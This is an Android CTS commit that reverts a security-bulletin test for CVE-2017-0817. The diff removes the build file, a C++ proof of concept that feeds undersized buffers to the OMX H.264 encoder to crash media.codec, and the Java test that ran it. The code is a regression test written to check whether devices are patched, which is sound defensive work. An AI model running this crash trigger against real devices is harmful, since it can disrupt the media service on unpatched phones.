[RESTRICT AUTOMERGE] Revert "CTS test for Android Security b/63522430"
This reverts commit 7d2c4454dd24309f7a8049c27ab852113600027e.
Test: sts-tradefed
Bug: 68653237
Merged-In: I22f22bf8314d2e79909a6127e9cfbc980cb100a1
Change-Id: I8e8f37e47b4d6f1995563908add2e196803bb126
diff --git a/hostsidetests/securitybulletin/AndroidTest.xml b/hostsidetests/securitybulletin/AndroidTest.xml
index c1aeae7..67312e3 100644
--- a/hostsidetests/securitybulletin/AndroidTest.xml
+++ b/hostsidetests/securitybulletin/AndroidTest.xml
@@ -169,7 +169,6 @@
<!--__________________-->
<!-- Bulletin 2018-01 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
- <option name="push" value="CVE-2017-0817->/data/local/tmp/CVE-2017-0817" />
<option name="push" value="CVE-2018-9527->/data/local/tmp/CVE-2018-9527" />
<!--__________________-->
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0817/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0817/Android.bp
deleted file mode 100644
index 5380fb5..0000000
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0817/Android.bp
+++ /dev/null
@@ -1,51 +0,0 @@
-/*
- * Copyright (C) 2020 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at:
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- *
- */
-
-cc_test {
- name: "CVE-2017-0817",
-
- defaults: ["cts_hostsidetests_securitybulletin_defaults"],
-
- srcs: [
- "poc.cpp",
- ":cts_hostsidetests_securitybulletin_omxutils",
- ],
-
- include_dirs: [
- "frameworks/native/include/media/openmax",
- "frameworks/av/media/libstagefright",
- "frameworks/native/include/media/hardware",
- ],
-
- shared_libs: [
- "libstagefright",
- "libbinder",
- "libmedia",
- "libmedia_omx",
- "libutils",
- "liblog",
- "libui",
- "libstagefright_foundation",
- "libcutils",
- "libhidlbase",
- "libhidlmemory",
- "libnativewindow",
- "android.hidl.allocator@1.0",
- "android.hidl.memory@1.0",
- "android.hardware.media.omx@1.0",
- ],
-}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0817/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0817/poc.cpp
deleted file mode 100644
index 778eef0..0000000
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0817/poc.cpp
+++ /dev/null
@@ -1,139 +0,0 @@
-/**
- * Copyright (C) 2020 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-
-#include "stdlib.h"
-#include "../includes/common.h"
-
-//This PoC is only for 32-bit builds.
-#if _32_BIT
-#include "../includes/omxUtils.h"
-#include <unistd.h>
-#include <hidlmemory/mapping.h>
-
-extern bool mUseTreble;
-sp<IAllocator> mAllocator = IAllocator::getService("ashmem");
-
-void exit_handler(void) {
- omxUtilsFreeNode();
-}
-
-int allocateHidlPortBuffers(OMX_U32 portIndex, Vector<Buffer> *buffers,
- int BufferSize) {
- buffers->clear();
- OMX_PARAM_PORTDEFINITIONTYPE def;
- int err = omxUtilsGetParameter(portIndex, &def);
- omxExitOnError(err);
-
- for (OMX_U32 i = 0; i < def.nBufferCountActual; ++i) {
- Buffer buffer;
- buffer.mFlags = 0;
- bool success;
- auto transStatus = mAllocator->allocate(BufferSize, [&success, &buffer](
- bool s,
- hidl_memory const& m) {
- success = s;
- buffer.mHidlMemory = m;
- });
- omxExitOnError(!transStatus.isOk());
- omxExitOnError(!success);
- buffers->push(buffer);
- }
- return OK;
-}
-
-void poc() {
- int i;
- Vector < Buffer > inputBuffers;
- Vector < Buffer > outputBuffers;
- status_t err = omxUtilsInit((char*) "OMX.google.h264.encoder");
- omxExitOnError(err);
- atexit(exit_handler);
-
- OMX_PARAM_PORTDEFINITIONTYPE def;
- omxUtilsGetParameter(OMX_UTILS_IP_PORT, &def);
-
- int inMemSize = def.nBufferCountActual * def.nBufferSize / 512;
- int inBufferCnt = def.nBufferCountActual;
- int inBufferSize = inMemSize / inBufferCnt;
-
- sp < MemoryDealer > dealerIn = new MemoryDealer(inMemSize);
- IOMX::buffer_id *inBufferId = new IOMX::buffer_id[inBufferCnt];
-
- omxUtilsGetParameter(OMX_UTILS_OP_PORT, &def);
-
- int outMemSize = def.nBufferCountActual * def.nBufferSize;
- int outBufferCnt = def.nBufferCountActual;
- int outBufferSize = outMemSize / outBufferCnt;
-
- sp < MemoryDealer > dealerOut = new MemoryDealer(outMemSize);
- IOMX::buffer_id *outBufferId = new IOMX::buffer_id[outBufferCnt];
-
- allocateHidlPortBuffers(OMX_UTILS_IP_PORT, &inputBuffers, inBufferSize);
- for (i = 0; i < inBufferCnt; ++i) {
- inBufferId[i] = inputBuffers[i].mID;
- sp < android::hidl::memory::V1_0::IMemory > mem = mapMemory(
- inputBuffers[i].mHidlMemory);
- memset((void *) mem->getPointer(), 0xCF, inBufferSize);
- omxUtilsUseBuffer(OMX_UTILS_IP_PORT, inputBuffers[i].mHidlMemory, &inBufferId[i]);
- }
-
- allocateHidlPortBuffers(OMX_UTILS_OP_PORT, &outputBuffers, outBufferSize);
- for (i = 0; i < outBufferCnt; ++i) {
- outBufferId[i] = outputBuffers[i].mID;
- omxUtilsUseBuffer(OMX_UTILS_OP_PORT, outputBuffers[i].mHidlMemory, &outBufferId[i]);
- }
-
- omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle);
- omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateExecuting);
-
- for (i = 0; i < inBufferCnt; ++i) {
- OMXBuffer omxBuf(0, inBufferSize);
- omxUtilsEmptyBuffer(inBufferId[i], omxBuf, 0, 0, -1);
- }
-
- for (i = 0; i < outBufferCnt; ++i) {
- OMXBuffer omxBuf(0, outBufferSize);
- omxUtilsFillBuffer(outBufferId[i], omxBuf, -1);
- }
-
- omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle);
- omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateLoaded);
-
- for (i = 0; i < inBufferCnt; ++i) {
- omxUtilsFreeBuffer(OMX_UTILS_IP_PORT, inBufferId[i]);
- }
-
- for (i = 0; i < outBufferCnt; ++i) {
- omxUtilsFreeBuffer(OMX_UTILS_OP_PORT, outBufferId[i]);
- }
-
- omxUtilsFreeNode();
- return;
-}
-#endif
-
-int main() {
-
-//This PoC is only for 32-bit builds.
-#if _32_BIT
- time_t currentTime = start_timer();
- while(timer_active(currentTime)) {
- poc();
- }
-#endif
-
- return EXIT_SUCCESS;
-}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java b/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java
index 1ce626b..9c5a2b7 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java
@@ -45,18 +45,6 @@
******************************************************************************/
/**
- * b/63522430
- * Vulnerability Behaviour: SIGSEGV in media.codec
- */
- @SecurityTest(minPatchLevel = "2018-01")
- @Test
- public void testPocCVE_2017_0817() throws Exception {
- String processPatternStrings[] = {"media\\.codec", "omx@\\d+?\\.\\d+?-service"};
- AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2017-0817", null, getDevice(),
- processPatternStrings);
- }
-
- /**
* b/36104177
* Vulnerability Behaviour: EXIT_VULNERABLE (113)
*/